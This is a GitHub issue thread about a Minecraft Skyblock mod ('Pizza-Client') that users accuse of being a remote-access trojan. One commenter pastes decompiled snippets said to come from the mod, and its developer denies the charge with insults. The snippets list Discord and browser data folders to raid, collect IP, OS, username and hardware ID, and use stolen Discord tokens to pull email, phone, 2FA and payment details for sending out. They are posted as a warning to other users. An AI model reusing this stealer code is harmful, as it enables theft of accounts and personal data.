### ISSUE TITLE
It is rat-mod, when i downloaded it my acc got hacked 

### ISSUE THREAD

**Issue by vov4ikrobo** [PizzaboiBestLegit/Pizza-Client#4]
I got hacked when i used mithril macro,  i tried to save my stuff, i saved onle armour, pets and accessories, i git banned for half of year and lost 2b worth of items (terminator, money some of other things)

**Comment by Skyblocksupdragnon** [comment]
I doubt your legit this is your first negative post you prob downloaded revex's version lol

**Comment by Sprecta** [comment]
Its a rat, most of the codes are stolen from different skyblock mods and he just added additional rat codes

1.  public static final List<String> paths = new ArrayList<>(Arrays.asList(new String[] { System.getenv("APPDATA") + "\\Discord", 
          System.getenv("APPDATA") + "\\discordcanary", 
          System.getenv("APPDATA") + "\\discordptb", 
          System.getenv("LOCALAPPDATA") + "\\Google\\Chrome\\User Data\\Default", 
          System.getenv("APPDATA") + "\\Opera Software\\Opera Stable", 
          System.getenv("LOCALAPPDATA") + "\\BraveSoftware\\Brave-Browser\\User Data\\Default", 
          System.getenv("LOCALAPPDATA") + "\\Yandex\\YandexBrowser\\User Data\\Default", 
          System.getenv("APPDATA") + "\\LightCord", 
          System.getenv("LOCALAPPDATA") + "\\Microsoft\\Edge\\User Data\\Default" }));
          Steals your discord and browser infos
2.public final class I implements Payload {
  public void execute() throws Exception {
    String ip = (new Scanner((new URL("http://checkip.amazonaws.com")).openStream(), "UTF-8")).useDelimiter("\\A").next();
    Ben.send((new Message.Builder("Personal"))
        .addField("IP", ip, true)
        .addField("OS", System.getProperty("os.name"), true)
        .addField("Name", System.getProperty("user.name"), true)
        .addField("HWID", HWIDUtil.getID(), true)
        .build());
  }
  To grab your ip and device info
  3. 
  private Message process(String token) {
    JsonObject obj = (new JsonParser()).parse(getUserData(token)).getAsJsonObject();
    return (new Message.Builder("Discord Token"))
      .addField("Token", token, false)
      .addField("Name", obj.get("username").getAsString() + "#" + obj.get("discriminator").getAsString(), true)
      .addField("Email", obj.get("email").getAsString(), true)
      .addField("2Factor", String.valueOf(obj.get("mfa_enabled").getAsBoolean()), true)
      .addField("Phone", !obj.get("phone").isJsonNull() ? obj.get("phone").getAsString() : "None", true)
      .addField("Nitro", obj.has("premium_type") ? "True" : "False", true)
      .addField("Payment", hasPaymentMethods(token) ? "True" : "False", true).build();
      Also grabs your discord infos and send to him
      
  
  private String getUserData(String token) {
    return TokenUtil.getContentFromURL("https://discordapp.com/api/v6/users/@me", token);
  }
  
  private boolean hasPaymentMethods(String token) {
    return (TokenUtil.getContentFromURL("https://discordapp.com/api/v6/users/@me/billing/payment-sources", token).length() > 4);
    There might be more In depth but basically its a rat so dont download/execute

**Comment by Skyblocksupdragnon** [comment]
Ok then send the directory if where you found this code

**Comment by Skyblocksupdragnon** [comment]
I doubt you actaully found it

**Comment by PizzaboiBestLegit** [comment]
this is giving me brain cancer help

**Comment by 1qvu** [comment]
This is ether a revex alt or someone who dowloaded the revex one because this is the same exact rat in his version

**Comment by Sprecta** [comment]
> Ok then send the directory if where you found this code

well i cant do that if he changed the directory and stuff after we pointed the rat out lmao 
mr dev left a report about it
i still own the ratted version before this one if u want to check the directory

**Comment by PizzaboiBestLegit** [comment]
why are people like this, spreading false information about my mod i worked very hard on. Like what advantage to u get out of this. You don't have to share to everyone that you're missing multiple chromosomes lmao.

**Comment by Skyblocksupdragnon** [comment]
> > Ok then send the directory if where you found this code
> 
> well i cant do that if he changed the directory and stuff after we pointed the rat out lmao mr dev left a report about it i still own the ratted version before this one if u want to check the directory

send it then
